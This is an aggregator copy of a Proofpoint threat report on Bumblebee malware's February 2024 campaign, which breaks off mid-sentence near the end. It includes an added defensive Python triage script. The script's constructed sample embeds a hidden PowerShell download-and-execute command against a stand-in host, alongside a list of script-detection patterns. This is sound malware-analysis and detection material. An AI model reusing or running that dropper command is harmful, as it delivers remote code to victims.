Source |
ProofPoint |
Identifier |
8449524 |
Publication date |
2024-02-13 07:32:08 (viewed: 2024-02-13 10:07:57) |
Title |
Bumblebee Buzzes Back in Black |
Text |
What happened
Proofpoint researchers identified the return of Bumblebee malware to the cybercriminal threat landscape on 8 February 2024 after a four-month absence from Proofpoint threat data. Bumblebee is a sophisticated downloader used by multiple cybercriminal threat actors and was a favored payload from its first appearance in March 2022 through October 2023 before disappearing.
In the February campaign, Proofpoint observed several thousand emails targeting organizations in the United States with the subject "Voicemail February" from the sender "info@quarlesaa[.]com" that contained OneDrive URLs. The URLs led to a Word file with names such as "ReleaseEvans#96.docm" (the digits before the file extension varied). The Word document spoofed the consumer electronics company Humane.
Screenshot of the voicemail-themed email lure.
Screenshot of the malicious Word document.
The document used macros to create a script in the Windows temporary directory, for example "%TEMP%/radD7A21.tmp", using the contents of CustomDocumentProperties SpecialProps, SpecialProps1, SpecialProps2 and SpecialProps3. The macro then executed the dropped file using "wscript".
Inside the dropped temporary file was a PowerShell command that downloaded and executed the next stage from a remote server, where it was stored under the file name "update_ver".
The next stage was another PowerShell command which in turn downloaded and ran the Bumblebee DLL.
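The staging trick above (script fragments hidden in custom document properties and reassembled by the macro at run time) is cheap to check for without opening the document. The following triage script is an added example, not Proofpoint's code: it builds a minimal .docm-like OOXML package in memory, then reads docProps/custom.xml, groups properties by name stem (SpecialProps, SpecialProps1, SpecialProps2, ...), joins each group in numeric order and scans the joined text for script indicators. The property names follow the write-up; the script text, the benign "Reviewer" property and the placeholder vbaProject.bin are constructed stand-ins, not the campaign's artifacts.

```python
"""Triage an OOXML document for script staged in custom document properties.

Added example, not Proofpoint's code. The sample .docm is constructed in
memory; property names follow the write-up, the script text is hypothetical.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS_CP = "http://schemas.openxmlformats.org/officeDocument/2006/custom-properties"
NS_VT = "http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"

# Tokens that mark a reassembled property group as script rather than metadata.
SCRIPT_INDICATORS = {
    "wscript": r"\bwscript\b",
    "powershell": r"powershell",
    "createobject": r"createobject\s*\(",
    "shell_run": r"\.run\b",
    "download": r"downloadstring|downloadfile",
    "iex": r"invoke-expression|\biex\b",
    "temp_dir": r"%temp%",
}


def split_name(name: str) -> tuple[str, int]:
    """'SpecialProps2' -> ('SpecialProps', 2); 'SpecialProps' -> ('SpecialProps', -1)."""
    m = re.fullmatch(r"(.*?)(\d*)", name)
    return m.group(1), (int(m.group(2)) if m.group(2) else -1)


def read_custom_properties(doc: bytes) -> list[tuple[str, str]]:
    """Return (name, value) pairs from docProps/custom.xml in file order."""
    with zipfile.ZipFile(io.BytesIO(doc)) as zf:
        if "docProps/custom.xml" not in zf.namelist():
            return []
        root = ET.fromstring(zf.read("docProps/custom.xml"))
    pairs = []
    for prop in root.findall(f"{{{NS_CP}}}property"):
        value_el = next(iter(prop), None)  # the single vt:* child (lpwstr, i4, ...)
        value = (value_el.text or "") if value_el is not None else ""
        pairs.append((prop.get("name", ""), value))
    return pairs


def triage(doc: bytes) -> dict:
    """Reassemble each property group in numeric order and scan the joined text.

    Scanning the joined text matters: a token can straddle two fragments, so
    scanning each property value on its own can miss it.
    """
    groups: dict[str, list[tuple[int, str]]] = {}
    for name, value in read_custom_properties(doc):
        stem, idx = split_name(name)
        groups.setdefault(stem, []).append((idx, value))
    findings = {}
    for stem, parts in groups.items():
        text = "".join(v for _, v in sorted(parts))
        hits = sorted(k for k, pat in SCRIPT_INDICATORS.items() if re.search(pat, text, re.I))
        if hits:
            findings[stem] = {"fragments": len(parts), "length": len(text),
                              "indicators": hits, "preview": text[:60]}
    with zipfile.ZipFile(io.BytesIO(doc)) as zf:
        has_vba = "word/vbaProject.bin" in zf.namelist()
    return {"has_vba_project": has_vba, "suspicious_property_groups": findings}


def build_sample_docm() -> bytes:
    """Constructed sample: a hypothetical dropper split over four properties."""
    script = (
        'Set sh = CreateObject("WScript.Shell")\n'
        "sh.Run \"powershell -w hidden -c IEX((New-Object Net.WebClient)"
        ".DownloadString('http://example.invalid/update_ver'))\", 0\n"
    )
    n = 4
    size = -(-len(script) // n)  # ceiling division, four roughly equal fragments
    frags = [script[i * size:(i + 1) * size] for i in range(n)]
    names = ["SpecialProps"] + [f"SpecialProps{i}" for i in range(1, n)]
    entries = [("Reviewer", "constructed benign value")] + list(zip(names, frags))
    props = "".join(
        f'<property fmtid="{{D5CDD505-2E9C-101B-9397-08002B2CF9AE}}" pid="{i + 2}" '
        f'name="{name}"><vt:lpwstr>{escape(value)}</vt:lpwstr></property>'
        for i, (name, value) in enumerate(entries)
    )
    custom_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Properties xmlns="{NS_CP}" xmlns:vt="{NS_VT}">{props}</Properties>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")       # minimal placeholder
        zf.writestr("word/document.xml", "<document/>")      # minimal placeholder
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0")  # OLE magic only, constructed
        zf.writestr("docProps/custom.xml", custom_xml.encode("utf-8"))
    return buf.getvalue()


if __name__ == "__main__":
    import json
    print(json.dumps(triage(build_sample_docm()), indent=2))
```

Run it on a real file by replacing build_sample_docm() with the bytes of the .docm; a hit on both has_vba_project and a property group carrying script indicators is the combination this campaign would show. Legitimate documents occasionally carry long custom properties, so treat the indicator list as a triage signal to route the file to sandboxing, not as a verdict.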
The Bumblebee configuration included:
Campaign ID: dcc3
RC4 Key: NEW_BLACK
It is notable that the actor is using VBA macro-enabled documents in the attack chain, as most cybercriminal threat actors have nearly stopped using them, especially those delivering payloads that can act as initial access facilitators for follow-on ransomware activity. In 2022, Microsoft began blocking macros by default in Office files downloaded from the internet, causing a massive shift in the landscape to attack chains that began using more unusual filetypes, vulnerability exploitation, combining URLs and attachments, chaining scripting files, and much more.
Another noteworthy feature of this campaign is that the attack chain is significantly different from previously observed Bumblebee campaigns. Examples used in prior campaigns that distributed Bumblebee with the “NEW_BLACK” configuration included:
Emails that contained URLs leading to the download of a DLL which, if executed, started Bumblebee.
Emails with HTML attachments that leveraged HTML smuggling to drop a RAR file. If executed, it exploited the WinRAR vulnerability CVE-2023-38831 to install Bumblebee.
Emails with zipped, password-protected VBS attachments which, if executed, used PowerShell to download and execute Bumblebee.
Emails that contained zipped LNK files to download an executable file. If executed, the .exe started Bumblebee.
Out of the nearly 230 Bumblebee campaigns identified since March 2022, only five used any macro-laden content; four campaigns used XL4 macros, and one used VBA macros.
Attribution
At this time Proofpoint does not attribute the activity to a tracked threat actor. The voicemail lure theme, use of OneDrive URLs, and sender address appear to align with previous TA579 activities. Proofpoint will continue to investigate and may attribute this activity to a known threat actor in the future.
Proofpoint assesses with high confidence Bumblebee loader can be used as an initial access facilitator to deliver follow-on payloads such as ransomware.
Why it matters
Bumblebee's return to the threat landscape aligns with a surge of cybercriminal threat activity after a notable absence of many threat actors and malware.
Recently, two threat actors, the tax-themed actor TA576 and the sophisticated TA866, appeared once again in email campaign data after months-long gaps in activity. Post-exploitation operator TA582 and the aviation and aerospace targeting ecrime actor TA2541 both reappeared in the threat landscape in late January after being absent since the end of November. Additionally, DarkGate malware reappeared |
Sent |
Yes |
Tags |
Ransomware
Malware
Vulnerability
Threat
|